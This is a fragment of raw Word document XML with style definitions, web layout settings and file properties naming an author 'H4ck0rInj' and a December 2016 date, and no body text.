    <w:rsid w:val="00F552D7"/>
    <w:rsid w:val="00F66A55"/>
    <w:rsid w:val="00F7226B"/>
    <w:rsid w:val="00F94971"/>
    <w:rsid w:val="00FA4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5:chartTrackingRefBased/>
  <w15:docId w15:val="{E5455CF5-EB30-49FC-A3D1-65D21E348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B05C6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C23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character" w:customStyle="1" w:styleId="Char">
    <w:name w:val="页眉 Char"/>
    <w:link w:val="a3"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="006C237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C237E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character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="页脚 Char"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="006C237E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C237E"/>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
    <w:name w:val="批注框文本 Char"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="006C237E"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="Emphasis"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="0048668C"/>
    <w:rPr>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:color w:val="CC0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C33EAA"/>
    <w:pPr>
      <w:widowControl/>
      <w:ind w:firstLineChars="200" w:firstLine="420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1807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530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78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2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93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386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402887">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="10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4188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5287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403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04231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78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21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9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340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830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709991">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="10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602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9399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744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68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70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99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166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255270">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="10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6306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4405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978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F04DE6-C277-44B1-A654-0ECF85F8D9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38</Pages>
  <Words>5508</Words>
  <Characters>31402</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>261</Lines>
  <Paragraphs>73</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>36837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H4ck0rInj</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>H4ck0rInj</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-12-11T07:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-11T07:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>